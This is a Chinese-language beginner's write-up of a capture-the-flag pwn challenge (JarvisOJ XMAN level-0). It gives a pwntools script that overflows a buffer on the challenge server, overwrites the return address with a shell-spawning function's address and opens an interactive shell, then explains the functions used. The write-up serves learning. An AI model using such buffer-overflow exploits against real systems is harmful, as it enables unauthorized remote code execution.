JarvisOj XMAN level-0

2018-12-05  本文已影响0人  chenmuxin

>纯新手向,第一次做pwn的题,感觉非常难以下手,有很多的新知识,在接触的过程中一点点的去学习。学习《汇编语言》(王爽)的写法,只写当初在做这道题的时候用到的函数语法

思路WP

main.png
vulner.png buff-r.png

代码

# -*- coding:utf-8 -*-
from pwn import *
sh = remote("pwn2.jarvisoj.com",9881) # 与服务器交互
# 填充
junk = ‘a‘*0x80
# 淹没bp
fakebp = ‘a‘*8
syscall = 0x0000000000400596
payload = junk + fakebp + p64(syscall) # p64()对整数进行打包
sh.send(payload)
sh.interactive() # 直接反弹shell进行交互

解释

remote():主要用作远程和服务器交互,返回一个类似连接对象
send():发送数据,通过连接对象调用
interactive():反弹shell,达到交互的作用
p64():数字转为字符串,在这里的作用即为将得到的地址转换为字符串
payload通常用做关键的信息或者数据

结果

level0.png
上一篇下一篇

猜你喜欢

热点阅读